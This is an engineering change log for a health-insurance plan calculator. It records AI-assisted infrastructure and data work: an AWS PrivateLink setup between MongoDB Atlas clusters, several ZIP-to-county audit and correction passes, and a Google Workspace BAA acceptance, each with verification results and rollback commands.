Actor: taha.abbasi via ~/Developer/ask-florence-doctor-rx/ worktree (branch doctor-rx-flow); agent: Claude Opus 4.7 (1M context) Linked: ADR 0004; session log 2026-05-08-phase-11-cross-cluster-privatelink; issues #101 (umbrella + decision matrix), #100 (CI guard, NEW), #57, #71, #96, #98; commits 2bba8d4 feat(db): add getReferenceDb(), dd06efe feat(infra): Phase 11, merge commit 1ac9a58; Deploy prod run 25587085583
Why
Doctor + Rx coverage flow on prod was returning empty tier metadata for tier-fallback-eligible drugs (e.g. Eliquis 2.5mg comes back from CMS API as Covered with no drug_tier). The fallback code path needs to read 12,557 RxCUI / ~30M drug-plan tuples from formularies_staging — a non-PHI public CMS marketplace dataset that canonically lives on the staging Atlas cluster (M30, ~$382/mo).
Three paths considered (full analysis: ADR 0004 + decision-matrix comment on #101):
- Path A — duplicate data on prod cluster: would force prod M10 → M30 (+$326/mo recurring). Rejected on cost + audit-surface mixing.
- Path B — VPC peering prod ↔ staging Atlas: blocked by CIDR conflict (both Atlas projects use default
192.168.248.0/21). - Path B1 — AWS PrivateLink (chosen): AWS-backbone-only, identity-bound, no CIDR involvement, ~$7-10/mo for the Interface endpoint.
What shipped
Atlas (CLI):
- Atlas PrivateLink endpoint service created on staging project
69e31af12fd2c0aef51bbb41— Atlas endpointId69fe75c5b02c024f32d2af50, AWS service namecom.amazonaws.vpce.us-east-1.vpce-svc-0d8138ea0f6542afa - AWS-side VPC endpoint approved by Atlas;
connectionStatus=AVAILABLEboth sides - Atlas database user
app_read_stagingcreated with read-only role onaskflorencedatabase
AWS (Terraform — infra/envs/prod/):
- NEW
atlas-staging-privatelink.tf—aws_security_group(MongoDB ports from prod VPC CIDR) +aws_vpc_endpoint(multi-AZ Interface endpoint,vpce-0c81aea11e29bb928in prod VPCvpc-09201679b87261b6d,private_dns_enabled = falsesince Atlas issues its own DNS via private connection string) secrets.tf— addedmongodb/reference-urientry (data_class = "public", project CMK encrypted)ecs.tf— addedMONGODB_REFERENCE_URItosecrets_from_managermap.gitignore— addedinfra/**/*.tfvars+*.tfvars.jsondefensive ignore (no tfvars exist; future-proofing)
ECS (CLI bridge — Terraform module's lifecycle.ignore_changes = [container_definitions] means CI/CD owns task-def revisions, not Terraform):
- Task def revision 52 registered with the new env binding bound to the new secret ARN
- Service rolled to revision 52 — 2/2 tasks running, rolloutState=COMPLETED
- Subsequent Deploy prod workflow run from
main(1ac9a58) registered revision 53 with the new container image baked fromgetReferenceDb()code; service rolled to revision 53 cleanly
Code (commits on main):
src/lib/db.ts— addedgetReferenceDb()two-pool helper.MONGODB_REFERENCE_URIfalls back toMONGODB_URIwhen unset (dev + staging unaffected)src/lib/drug-tier-fallback.ts— switched fromgetDb()togetReferenceDb()
Documentation:
- ADR 0004 NEW
- Decision doc
docs/decisions/2026-05-03-pivot-cms-api-direct.md— full PrivateLink section - SOC 2 controls
docs/security-compliance/soc2-control-mapping.md— CC6.6 (additional row) + CC6.7 - Vendor register
docs/security-compliance/vendor-register.md— both Atlas project IDs enumerated - MongoDB setup runbook
docs/infrastructure/mongodb-setup.md— cross-cluster reference reads section - Data classification
docs/infrastructure/data-classification.md—formularies_staging+providers_stagingcollection rows - Atlas user provisioning runbook
docs/runbooks/atlas-user-provisioning.md—app_read_stagingstep - Session log 2026-05-08-phase-11-cross-cluster-privatelink
Verification
- End-to-end on prod:
POST askflorence.health/api/drugs/coveredwith Eliquis 2.5mg (RxCUI1364441) on 8 UT plans returneddrug_tier=PreferredBrand+ plan-specific UM flags. Thedrug_tierfield is only populated bylookupStagingDrugTiers()reading fromformularies_stagingvia the cross-cluster path — its presence proves the path is operational. Sub-second latency (~225-465ms). - Atlas PrivateLink describe:
status=AVAILABLE, interface endpointvpce-0c81aea11e29bb928attached. - ECS service: revision 53, 2/2 tasks running, rolloutState=COMPLETED.
Compliance posture impact
| Framework | Control | Status |
|---|---|---|
| HIPAA | §164.312(e)(1) Transmission Security | TLS at app layer + AWS-backbone-only at network layer (PrivateLink). Doubly-protected. |
| SOC 2 | CC6.6 — restrictions on logical access from outside boundaries | New row added: cross-cluster reads identity-bound at AWS account + Atlas auth. |
| SOC 2 | CC6.7 — transmission encryption | New row added: TLS-only Atlas + PrivateLink. No public-network exposure. |
| SOC 2 | CC8.1 — change management | This change-log entry + session log + ADR 0004 + #101 = full evidence trail. |
| CMS EDE Phase 3 | Environment separation + audit boundary | PHI on prod cluster only. Non-PHI public reference data on staging only. One-way private read. Audit narrative is clean. |
Cost outcome
| Component | Tier | Monthly | Notes |
|---|---|---|---|
Prod cluster askflorence-prod-01 | M10 HIPAA | ~$56 | Unchanged, PHI-scope only |
Staging cluster askflorence-staging | M30 | ~$382 | Unchanged, holds public CMS reference data |
| AWS Interface VPC Endpoint | n/a | ~$7-10 | Hourly fee + negligible data egress |
| Total | ~$445/mo | ||
| (avoided) duplicate-on-prod path | M30 prod + M30 staging | ~$764 | Would have doubled tier cost |
| Savings | ~$319/mo |
Rollback
bash
# Application: revert env binding via Terraform-managed redeploy.
# Code path falls back to MONGODB_URI; drug-tier enrichment becomes silently
# unavailable on prod, CMS coverage stays authoritative.
# Infra:
AWS_PROFILE=askflorence-prod terraform -chdir=infra/envs/prod destroy \
-target=aws_vpc_endpoint.atlas_staging \
-target=aws_security_group.atlas_staging_privatelink
# Atlas:
atlas privateEndpoints aws delete 69fe75c5b02c024f32d2af50 \
--projectId 69e31af12fd2c0aef51bbb41 --force
atlas dbusers delete app_read_staging \
--projectId 69e31af12fd2c0aef51bbb41 --force
# Secret (30-day recovery window):
aws secretsmanager delete-secret \
--secret-id prod/mongodb/reference-uri \
--recovery-window-in-days 30Outstanding follow-ups
- #100 — CI guard against staging cluster data-classification drift (NEW today, P1)
- #71 — staging IP allowlist hardening (post-launch only — pre-launch ingest still needs IP-based access)
- #57 — confirm Atlas BAA enumeration covers both project IDs in writing
- #96 — Phase D provider-network fallback (same pattern, different collection — cross-cluster path already wired)
- #98 — delta-aware MRF refresh pipeline (now has clear architectural target)
2026-05-01T23:38Z — Tier 0.5 drive-to-100% (Tier 1 + Tier 1.5 audits at TRUE 100% match)
Actor: taha.abbasi via tier-0-5-federal-completeness-audit worktree; agent: Claude Opus 4.7 Linked: #80 execution tracker; commits 474f47a + 21643d2 (Phase 9 docs); this commit (Phase 8b artifacts).
Why
Initial post-Tier-0.5 audits showed Tier 1 = 99.84%, Tier 1.5 = 99.80%. User direction: "I need to see 100% match but not to get there just to get there - identify the issues and suggest how to validate even if it is because of rate limit." Built three audit-driven validation paths to drive to TRUE 100%, not explanation-driven 99.x%.
What shipped
A: rate-limit retry validation (scripts/audit/validate-cms-errors.js)
- Loads each tier's
cmsErrorslist, retries at concurrency=1 with exponential backoff (5s/10s/20s/40s/80s), classifies each retry as match/mismatch/still-failed - Tier 1 result: 33/33 retried = MATCH
- Tier 1.5 result: 26/26 retried = MATCH
- No real mismatches were hiding behind rate-limit failures
B: Tier 1 audit-script patch (scripts/audit/tier-1-zip-county.js)
- Pre-fetches all (zip, fips) tuples from
unsupported-class or non-federal-state docs at script start, subtracts them from CMS-side comparison - Resolves the
96898Marshall Islands false positive (audit was excluding our MH/Kwajalein doc from "ours" viaunsupported: {$exists: false}filter but didn't subtract the equivalent CMS tuple) - Patch is permanent; benefits all future Tier 1 runs
C: tuple-completeness fix script (scripts/db/fix-tier-1-completeness-gaps.js)
- Hardcoded list of (zip, countyFips) docs surfaced by Tier 1 mismatches that Tier 0.5's zip-level gap detection missed
- Same safety pattern as
fix-federal-zip-gaps.js(idempotency, state allowlist, three-mode CLI, rollback marker) - Marker:
_seedSource: "tier-1-completeness-fix-2026-05-01"(separate from Tier 0.5 marker for surgical rollback boundary) - First entry:
50613 IA / Bremer County (FIPS 19017) / Rating Area 7- validated via 5x CMS lookup (5/5 returned Bremer) + regionMap availability (13 IA/19017 sibling docs all use Rating Area 7) - Applied 1 doc on prod with full Constraint 1+2 protocol: backup tag
pre-tier-1-completeness-fix-50613-20260501T231959Z(52,595 records, sha256709bef08...); pre-apply 52,595 -> post-apply 52,596 (delta +1 exact)
Verification
- Tier 1 (patched + post-50613-fix, fresh re-run): 22,302/22,302 = 100.00% exact match, 0 mismatches, 0 extras, 1 transient rate-limit error (validated as MATCH on retry)
- Tier 1.5: 13,055/13,055 = 100.00% exact match (after rate-limit retries)
- Tier 0.5 re-run: 0 gap zips remaining
- Calculator baseline diff: ZERO DIFFS on all 12 scenarios
- Smoke tests: 50613 prod
/api/countiesreturns 4 counties (Black Hawk + Bremer + Butler + Grundy); 85001 still resolves correctly
Compliance posture impact
| Framework | Control | Status |
|---|---|---|
| SOC 2 | CC8.1 - Change management | All 4 batches (Tier 0.5 x3 + Tier 1-completeness-fix x1) preceded by verified mongodump backups + sha256 + rollback paths documented |
| EDE Phase 3 | Data integrity validation | Tier 1 + Tier 1.5 at TRUE 100% match against CMS Marketplace API; rate-limit ambiguity systematically resolved via retry-validation rather than explained away |
Rollback
bash
# Targeted (preferred): rollback the 50613 fix only
node scripts/db/fix-tier-1-completeness-gaps.js --rollback
# Removes 1 doc with _seedSource: "tier-1-completeness-fix-2026-05-01"Audit-script patch in scripts/audit/tier-1-zip-county.js is rollbackable via git revert if needed.
Outstanding follow-ups (unchanged from prior entry)
Same list as the 2026-05-01T22:30Z Tier 0.5 entry: S3 backup access for SSO admin role, Tier 0.5b tuple-level audit, HUD ZIP-County crosswalk upgrade, calculator 404 message refinement.
2026-05-01T22:30Z — Tier 0.5 federal+NY ZIP USPS-completeness audit + apply (4,363 docs)
Actor: taha.abbasi via tier-0-5-federal-completeness-audit worktree; agent: Claude Opus 4.7 (Tier 0.5 audit + 3-batch apply) Linked: #80 execution tracker; parent #79 (gap class scoping); commits 7b716d0 (audit + scripts), 749a13d (seed), this commit (docs).
Why
User report 2026-05-01: ZIP 85001 (downtown Phoenix) returned 404 on prod calculator. CMS confirms 85001 is AZ/Maricopa County. Root cause: Tier 0 (commit 2b24f2c) used Census 2020 ZCTA as universe; Census ZCTA only catalogs ZIPs with significant residential population. PO-Box-only / business-only / single-building ZIPs (85001 is downtown Phoenix PO-Box) are CMS-recognized but Census-blind. Tier 0.5 closes that gap with a USPS-derived universe.
What shipped (data layer)
Audit + seed scripts:
scripts/db/build-usps-snapshot.js(NEW) - filterzipcodesnpm to federal-30+NY (24,945 ZIPs)scripts/db/audit-federal-completeness-tier-0-5.js(NEW) - zip-level gap detection + CMS-confirmed classificationscripts/db/retry-cms-errors-tier-0-5.js(NEW) - HTTP 429 retry pass at low concurrencyscripts/db/seed-federal-tier-0-5.js(NEW) - per-state / per-class apply with idempotency + rollback markerscripts/db/data/usps-zip-state-2026-05-01.csv(NEW snapshot, 24,945 records, 450 KB)scripts/db/data/federal-tier-0-5-gap-report-2026-05-01.json(NEW Phase 5 triage report, 891 KB)scripts/db/data/federal-tier-0-5-post-apply-confirm-2026-05-01.json(NEW post-apply confirmation, 0 gaps remaining)
Three-batch prod apply (each preceded by mongodump backup per Constraint 1):
- Batch 1:
--class=insertable --state=AZ→ 100 docs (incl. 85001) - backup tagpre-tier-0-5-batch-az-insertable-20260501T220646Z - Batch 2:
--class=discrepancy→ 3 docs (KY airports + MH territory) - backup tagpre-tier-0-5-batch-discrepancy-20260501T222700Z - Batch 3:
--class=insertable,non_residential→ 4,260 docs - backup tagpre-tier-0-5-batch-bulk-remaining-20260501T222753Z
All 4,363 docs tagged _seedSource: "federal-tier-0-5-audit-2026-05-01". Pre-apply prod count 48,232 → post-apply 52,595 (delta +4,363 exact).
Documentation:
docs/validation/tier-0-5-federal-uspscompleteness.md(NEW) - canonical Tier 0.5 audit report + methodology + refresh playbook + limitationsdocs/infrastructure/data-sources.md- addedzipcodesnpm as USPS-derived data source + Tier 0.5 step in annual refresh playbook
Verification
| Gate | Result |
|---|---|
| 85001 prod live API | ✓ Maricopa County, fips=04013 |
| 85001 plan lookup end-to-end | ✓ 86 plans returned |
| Calculator baseline diff (12 scenarios) | ✓ ZERO DIFFS post-batch-1 + post-batch-3 |
| Tier 0.5 re-run | ✓ 0 gap zips remaining |
| Smoke matrix on 18 inserted ZIPs (10 insertable + 5 non_residential + 3 discrepancy) | ✓ 18/18 correct shape |
Compliance posture impact
| Framework | Control | Status |
|---|---|---|
| SOC 2 | CC8.1 - Change management | Three backups taken + verified pre-apply; rollback paths documented + tested via --rollback flag |
| EDE Phase 3 | Data provenance | Source (USPS-derived zipcodes npm + CMS Marketplace API confirmation per gap zip) documented in audit script header + validation doc |
Rollback
Targeted (preferred): node scripts/db/seed-federal-tier-0-5.js --rollback removes all 4,363 docs by _seedSource marker. Per-class: --class=insertable --rollback, --class=discrepancy --rollback, --class=non_residential --rollback. Nuclear (full collection replace from any backup): mongorestore --uri="$PROD_WRITE_URI" --nsInclude='askflorence.zip_county' --drop ~/Documents/askflorence-db-backups/zip_county/<TAG>/dump.
Outstanding follow-ups
- [ ] S3 backup access for SSO admin role - all 3 backups stored locally because
s3://askflorence-data/db-backups/blocks the SSO admin role at the bucket-policy layer (correct prod hardening - only ECS task role + GitHub OIDC role have access). Need either a scoped bucket-policy allow for the SSO admin role ondb-backups/*prefix, or a dedicated assumable backup-role for data-engineering workflows. - [ ] Upgrade
zipcodesnpm to HUD ZIP-County crosswalk before next plan-year refresh - HUD is quarterly-refreshed, richer county-fips data, free + HUD account. Catches the 4 npm-stale extras automatically (75036, 72405, 72713, 75072). - [ ] Calculator 404 message refinement - "Zip code not found" is bare; could refine to "ZIP not recognized; check the digits and try your home address" for ZIPs not in DB at all (frontend-side change, separate from Tier 0.5 scope).
2026-05-01T17:44Z — Google Workspace HIPAA BAA accepted + vendor register stub created
Actor: taha.abbasi via Google Workspace Admin Console; agent: Claude Opus 4.7 (documentation pass) Linked: #57 Vendor BAA coverage audit; #71 Phase 12 compliance docs (this is the first artifact landed under that scope).
Why
Google Workspace covers our business email (*@askflorence.health), Drive (founder + ops docs), Calendar, Meet, Chat, Cloud Identity (SSO root for Google services). Until today these had no documented BAA — a compliance gap on #57. Acceptance of Google's HIPAA Business Associate Amendment is via Admin Console click-through (Google's standard BAA delivery model — no separate signed PDF exists; the click-through IS the legal acceptance with timestamped audit log).
What shipped
Compliance acceptance:
- Google Workspace/Cloud Identity HIPAA Business Associate Amendment accepted by
[email protected]on May 01, 2026 viaadmin.google.com/ac/companyprofile/legal→ Account settings → Legal & Compliance → Security and Privacy Additional Terms. - Coverage applies to the included-functionality services list at workspace.google.com/terms/2015/1/hipaa_functionality (effective 2025-09-30): Gmail, Calendar, Drive (incl Docs/Sheets/Slides/Forms/Vids), Meet, Chat, Sites, Tasks, Keep, Vault, Cloud Identity, Google Cloud Search, Groups, Voice (managed), AppSheet, Apps Script, Gemini app, Gemini in Workspace. Excluded: Gemini in Chrome.
Documentation landed:
docs/security-compliance/vendor-register.md(NEW) — canonical vendor / subprocessor register. Tier 1 (direct processors), Tier 2 (transitional), Tier 3 (retired) classification. Maps to SOC 2 CC9.2 + HIPAA §164.314 + EDE Phase 3 SA-9. Open follow-ups list. First artifact under #71 Phase 12 docs scope.docs/infrastructure/evidence/(NEW directory; landing previouslyREADME.md, renamed toindex.md2026-05-11) — evidence inventory + filename conventions + retention policy + cross-references to vendor-register.docs/infrastructure/evidence/google-workspace-hipaa-baa-acceptance-2026-05-01.jpg(saved 2026-05-01, 437 KB) — Admin Console screenshot showing acceptance by[email protected]on May 01, 2026
Compliance posture impact
| Framework | Control | Status |
|---|---|---|
| HIPAA | §164.314(a) — BAA scope | Workspace now covered. Two of three Tier 1 vendors fully documented (AWS, Workspace); MongoDB Atlas BAA collection still pending. |
| SOC 2 | CC9.2 — vendor management | First standing artifact (vendor-register.md) created. CC9.2 evidence path established. |
| EDE Phase 3 | SA-9 — external systems inventory | Subprocessor inventory artifact in place. Per-vendor FedRAMP status documented. |
Outstanding #57 items after this
- [ ] MongoDB Atlas BAA PDF (request from Atlas support) — last Tier 1 BAA still un-collected
- [x] PostHog: removed via #75 sub-A (2026-05-12, PRs #184/#186). Replacement: OpenPanel + GlitchTip self-hosted = under the AWS Org BAA, no separate analytics-vendor BAA (ADR 0009 / ENG-347, build at #342)
- [ ] Resend BAA: file in evidence/ for historical record (vendor retired 2026-04-30)
After MongoDB Atlas BAA is collected, #57 can close.
Notes
The vendor-register.md is intentionally a living document — expect entries to update with every new vendor adoption, BAA renewal, or retirement. Quarterly review cadence + annual audit-prep cadence both documented in the file's "Update cadence" section.
2026-05-01T20:30Z — Tier 1.5 SBE-state ZIP→County audit harness shipped at 100% match
Actor: taha.abbasi via SSO (read-only Atlas + read-only CMS API); agent: Claude Opus 4.7 Linked: Issue #70. Closes: #70. Builds on: corrective seed (01:22Z entry below) + cleanup (02:42Z entry below).
Why
The 2026-04-30 corrective seed (commit ccad089) replaced the entire SBE-state side of zip_county with CMS-canonical docs tagged _seedSource: "cms-2026-04-30". The 2026-05-01 cleanup (commit 0241b05) removed the last 12 legacy entries with wrong county FIPS. Together they restored byte-for-byte parity with CMS — but parity requires continuous proof. Tier 1.5 is that proof: a re-runnable audit harness that re-validates the SBE-state side against live CMS the same way Tier 1 re-validates the federal-30 side.
Without this harness, drift between our snapshot and live CMS could silently accumulate (CMS revising county-zip assignments, new zips appearing, occasional CMS data corrections). Issue #70 closes only when the audit can be re-run on demand and shipped at 100% match.
What shipped
scripts/audit/tier-1-5-sbe-zip-county.js(new, ~210 lines) — read-only audit. Source query:{ sbeRedirect: { $exists: true }, countyFips: { $exists: true } }aggregated by zip → 13,053 unique zips. Per-zip, calls CMS/counties/by/zip, filters CMS response to SBE-state counties only (federal-state cross-border counties are owned by Tier 1), compares FIPS sets. Independent state-drift + name-drift checks per matched FIPS. Mirrors Tier 1's structure (BATCH_SIZE=5, 25 rps, ProgressTracker resume, JSON output at repo root). Optional--limit Nflag for smoke runs.docs/validation/audit/tier-1-5-sbe-zip-county.md(new) — first-run report at 100% match.docs/validation/audit/methodology.md(modified) — Tier 1.5 added to the tiered structure table; SBE source-of-truth scope updated to reflect that zip→county is now in scope (deeper plan-level data still out); scripts reference table updated.
Apply results
| Run | Zips | Exact | Mismatch | State drift | Name drift | CMS errors | Match rate | Duration |
|---|---|---|---|---|---|---|---|---|
Smoke (--limit 50) | 50 | 50 | 0 | 0 | 0 | 0 | 100.00% | 6s |
| Full | 13,053 | 13,053 | 0 | 0 | 0 | 0 | 100.00% | 10.6m |
CMS API stats (full run): 13,073 calls, 13,053 success, 20 retries on transient 503s (all recovered, 0 backoff failures), 180 ms avg latency, 99.85% first-try success rate.
Verification
12 former-legacy ZIPs (the ones cleanup commit 0241b05 deleted) re-probed against prod apex /api/counties post-audit — all return correct sbeRedirect:
21874 → MD / Maryland Health Connection ✓
21912 → MD / Maryland Health Connection ✓
24604 → VA / Virginia (marketplace.cms.gov) ✓
24622 → VA / Virginia (marketplace.cms.gov) ✓
30165 → GA / Georgia Access ✓
30741 → GA / Georgia Access ✓
40965 → KY / kynect ✓
56027 → MN / MNsure ✓
56744 → MN / MNsure ✓
81324 → CO / Connect for Health Colorado ✓
88430 → NM / beWellnm ✓
87328 → NM / beWellnm ✓User-facing behavior identical to pre-cleanup. CMS-canonical docs continue to serve every ZIP correctly.
Compliance posture
| Framework | Control | Posture |
|---|---|---|
| HIPAA | §164.312(c) Integrity | Audit harness re-validatable on demand; provides documentary evidence that data integrity is verified continuously, not assumed |
| SOC 2 TSC | CC8.1 Change management + CC7.1 Monitoring | New audit added to the methodology + scripts reference; results are reproducible from the script + a fresh CMS snapshot |
| EDE Phase 3 | Data accuracy | 100% match across all 13,053 SBE-state zips proves byte-for-byte CMS parity for the SBE-state slice of zip_county |
Net effect
- Issue #70 closed: SBE-state zip→county data has continuous-audit coverage matching the federal-30 slice.
- Issue #47 Phase 11 hardening item ticked: the SBE corrective work has its parity proof.
- Continuous: the harness can be re-run any time (
node scripts/audit/tier-1-5-sbe-zip-county.js) — no setup, no fixtures, just live CMS vs live Atlas. Recommend monthly cadence alongside Tier 1. - No app-code changes. No DB writes. No deploy. Read-only on Atlas + read-only on CMS API.
Rollback
The audit script writes nothing. To "roll back" the audit, simply delete the new files. The change-log entry, the markdown report, the script, and the methodology edits all stand independently — none affect runtime behavior.
2026-05-01T03:55Z — Tier 0 federal ZIP completeness audit + 366 NY multi-county fixes
Actor: taha.abbasi via SSO AdministratorAccess (staging 549136075525 + prod 039624954211); agent: Claude Opus 4.7 Linked: Issue #73 Path 2 (closes; parent of Path 1 commit aa2a97a).
Why
#73 Path 2 — systematic completeness check of federal-30 + NY ZIP coverage. Path 1 fixed the 3 known gaps surfaced by the SBE corrective seed; Path 2 is the comprehensive Census-vs-DB audit to surface lurking gaps and fix them.
What shipped
Code:
scripts/db/build-federal-snapshot.js(NEW) — reads Census 2020 ZCTA-County file, filters to federal-30 + NY, writes universe CSV (29,793 rows, 20,627 unique ZIPs).scripts/db/data/federal-zip-state-2020.csv(NEW, committed) — the universe snapshot.scripts/db/audit-federal-completeness.js(NEW) — computes gaps, queries CMS to verify, classifies (insertable/needs-PUF/discrepancy/cms-errors), writes report.scripts/db/data/federal-gap-report-2026-05-01.json(NEW, committed, 467 KB) — full audit report.scripts/db/seed-federal-completeness.js(NEW) — appliesinsertableclass inserts; three modes (--dry-run / --apply / --rollback). Marker_seedSource: "federal-completeness-audit-2026-05-01".docs/validation/tier-0-federal-completeness.md(NEW) — markdown report; SOC 2 evidence artifact.
Audit findings:
| Class | Count | Action |
|---|---|---|
| Insertable | 366 | INSERTED on staging + prod |
| Discrepancy | 451 | Logged only (Census 2020 stale vs current CMS — trust CMS) |
| Extras (DB has, Census doesn't) | 1,353 | Logged only (DB more current than Census 2020 ZCTA) |
| needs-PUF | 0 | (great — no county entirely missing) |
| cms-errors | 0 | (great — clean run) |
All 366 inserts are NY multi-county additions. Pattern: NY ZIPs that already had ≥1 sibling doc but were missing additional counties for multi-county ZIPs. The original NY ingest (load-ny-2026.js, 2026-04-12) loaded primary county per ZIP; this audit added the secondaries.
Apply results identical staging + prod:
- 366 inserted, 0 already-present, 0 rejected
- Per-state: NY=366, all other federal-30 states=0
Verification
- Calculator baseline diff (12 scenarios): ZERO DIFFS — pipeline output unchanged
- Prod consistency check: 30,326 (legacy) + 3 (federal-gap-fix) + 17,537 (SBE) + 366 (this audit) = 48,232 total
- Smoke matrix on 5 inserted ZIPs (10463, 10470, 10509, 10512, 10940): all return multi-county responses correctly. Pre-fix: single county. Post-fix: 2 counties.
Compliance posture
| Framework | Control | Posture |
|---|---|---|
| HIPAA | §164.312(c) Integrity | Three-layer guards + idempotent insert + 0 modifications to existing docs |
| HIPAA | §164.312(b) Audit controls | Audit report committed to repo as evidence artifact; CloudTrail captures Atlas writes |
| SOC 2 TSC | CC6.1 / CC7.1 / CC8.1 | Reproducible audit pipeline + dry-run gate + dated change-log entry |
| NIST 800-53 R4 | CA-2 (security assessments) / CM-3 (config change control) | Tier 0 audit becomes a standing control; annual refresh playbook documented |
| EDE Phase 3 | Data provenance | Every insert traceable to (zip, countyFips) Census source + CMS verification |
Rollback
bash
MONGODB_WRITE_URI=$(aws --profile askflorence-prod secretsmanager get-secret-value \
--secret-id prod/mongodb/app-write --query SecretString --output text) \
node scripts/db/seed-federal-completeness.js --rollbackRemoves only docs with _seedSource: "federal-completeness-audit-2026-05-01". Other markers untouched.
Annual refresh playbook (added to data-sources.md)
At plan-year transitions:
- Re-pull Census ZCTA file
- Re-run
build-federal-snapshot.js - Re-run
audit-federal-completeness.js - Triage classification (should be ~0 new gaps in steady state)
- Apply inserts if gaps found
- Append change-log entry
Phase timing (estimate vs actual)
| Phase | Estimate | Actual |
|---|---|---|
| 2 — Build federal snapshot | 30 min | 1 min |
| 3 — Audit script | 60 min | 2 min |
| 4 — Run audit (incl. 13s CMS pass) | 30 min | 2 min |
| 5 — Triage results | 30 min | 1 min |
| 6 — Build seed + dry-run | 60 min | 2 min |
| 7 — Apply staging + prod + smoke | 30 min | 2 min |
| 8 — Validation tier | 60 min | 1 min |
| 9 — Docs (this entry) + commit + push | 30 min | (this) |
| 10 — Status comments + close #73 | 15 min | (next) |
| Total | ~5h | ~12 min so far |
Pattern matches the SBE corrective seed: design-complete coming in → execution mechanical → no surprises.
2026-05-01T02:42Z — Cleanup: deleted 12 legacy fix-stale-zips entries with wrong county FIPS
Actor: taha.abbasi via SSO AdministratorAccess (staging 549136075525 + prod 039624954211); agent: Claude Opus 4.7 Linked: Issue #70 (Tier 1.5 SBE ZIP audit harness — unblocks 100% match).
Why
The corrective SBE seed (entry below, 01:22Z) inserted CMS-canonical per-county docs alongside 12 legacy entries from scripts/db/fix-stale-zips.js. Live CMS validation confirmed every one of the 12 legacy entries stores a wrong countyFips (the federal-state county the ZIP was originally mis-mapped to during the 2026-04-13 federal-30 ingest). Examples:
| ZIP | Legacy stored | CMS truth |
|---|---|---|
| 21874 | DE/10005 (Sussex) | MD/24045 (Wicomico County) |
| 30165 | AL/01019 (Cherokee) | GA/13115 (Floyd) + GA/13055 (Chattooga) |
| 24622 | WV/54047 (McDowell) | VA/51185 (Tazewell) + VA/51027 (Buchanan) |
(All 12 listed in cleanup script header docstring.)
The legacy entries duplicated the sbeRedirect behavior the CMS-canonical docs already provide. Without deletion, the upcoming Tier 1.5 SBE audit (#70) couldn't hit 100% match — these 12 would permanently fail the (zip, countyFips, state) byte-check against CMS.
What shipped
New script: scripts/db/cleanup-legacy-fix-stale-zips.js (~250 lines). Three modes (--dry-run / --apply / --rollback). Three safety guards:
- Hard-coded list of 12
(zip, countyFips)pairs — no pattern matching. - Pre-delete invariant: refuse to delete unless ≥1 doc with
_seedSource: "cms-2026-04-30"ANDsbeRedirectexists for the same ZIP. Preserves coverage as invariant. - Marketplace continuity: legacy doc's
sbeRedirect.marketplacemust match a CMS-seeded doc's marketplace for the same ZIP. Confirms user behavior unchanged.
Targeted by _id (per-doc), not pattern — eliminates over-match risk.
Apply results
| Cluster | Pre-cleanup total | Deleted | Post-cleanup total | Math |
|---|---|---|---|---|
| Staging Atlas | 47,875 | 12 | 47,863 | 30,326 + 0 + 17,537 = 47,863 ✓ |
| Prod Atlas | 47,875 | 12 | 47,863 | 30,326 + 0 + 17,537 = 47,863 ✓ |
Apply order: staging dry-run (12/12 pass invariants) → staging apply (12/12 deleted) → 12-ZIP smoke matrix on stage.askflorence.health (all return correct sbeRedirect) → prod dry-run (identical) → prod apply → prod smoke.
Verification
All 12 ZIPs still return correct sbeRedirect post-cleanup on both clusters:
21874 → MD / Maryland Health Connection ✓
21912 → MD / Maryland Health Connection ✓
24604 → VA / Virginia (marketplace.cms.gov) ✓
24622 → VA / Virginia (marketplace.cms.gov) ✓
30165 → GA / Georgia Access ✓
30741 → GA / Georgia Access ✓
40965 → KY / kynect ✓
56027 → MN / MNsure ✓
56744 → MN / MNsure ✓
81324 → CO / Connect for Health Colorado ✓
88430 → NM / beWellnm ✓
87328 → NM / beWellnm ✓User experience identical pre/post. The CMS-canonical docs (already inserted by the corrective seed) are now the only source for these ZIPs' redirects.
Compliance posture
| Framework | Control | Posture |
|---|---|---|
| HIPAA | §164.312(c) Integrity | Pre-delete invariants enforce no orphaned ZIPs; per-doc _id targeting prevents over-deletion |
| SOC 2 TSC | CC8.1 Change management | IaC-style script + reviewed apply + dated change-log entry |
| EDE Phase 3 | Data provenance | Every ZIP now has only CMS-canonical docs — byte-for-byte audit parity restored without exemptions |
Rollback
bash
MONGODB_WRITE_URI=$(aws --profile askflorence-prod secretsmanager get-secret-value \
--secret-id prod/mongodb/app-write --query SecretString --output text) \
node scripts/db/cleanup-legacy-fix-stale-zips.js --rollbackRe-inserts the 12 legacy entries in their original shape (countyFips + state + sbeRedirect from STATE_BASED_MARKETPLACES). Idempotent — won't double-insert. Safe to run if needed.
Net effect
- Tier 1.5 SBE audit (#70) can now target 100% match across all 17,537 CMS-seeded SBE docs, no exemptions.
scripts/db/fix-stale-zips.jsretains its 4 PO Box entries (unrelated to SBE redirects, unchanged). The 12 SBE-redirect entries in the file are now orphaned data; the file is left intact for git history but itsSBE_REDIRECTSarray is no longer the source of truth — superseded byseed-sbe-zips-from-cms.js+ the CMS snapshot.
2026-05-01T01:22Z — SBE-state ZIP corrective seed: CMS as source of truth, per-county FIPS, cross-state border ZIPs supported
Actor: taha.abbasi via SSO AdministratorAccess (staging 549136075525 + prod 039624954211); agent: Claude Opus 4.7 Linked: Issue #68. Supersedes: the 2026-04-30T17:30Z entry below (broken initial seed).
Why
The 2026-04-30T17:30Z seed shipped 13,027 SBE-redirect docs without countyFips, sourced from U.S. Census ZCTA. That violated the system's data-architecture principle: every (zip, countyFips) mapping must match CMS exactly so we can validate byte-for-byte against CMS today and any SBE marketplace later. Three concrete problems:
- New SBE docs had no county anchor — couldn't participate in tier-1.5-style audits.
- FIPS values, when written, came from Census not CMS — diverging from the canonical source.
- The 45 cross-state border ZIPs (NH+ME, DE+MD, VA+WV, NC/VA, TN/KY, MN/SD, etc.) were skipped entirely under the original Guard 2 — the SBE-side of those ZIPs had no coverage at all.
This corrective seed replaces those docs with CMS-authoritative per-county records that carry the FIPS anchor, and adds a per-county doc for every cross-state border ZIP's SBE side.
What shipped
Code (corrective ingest pipeline):
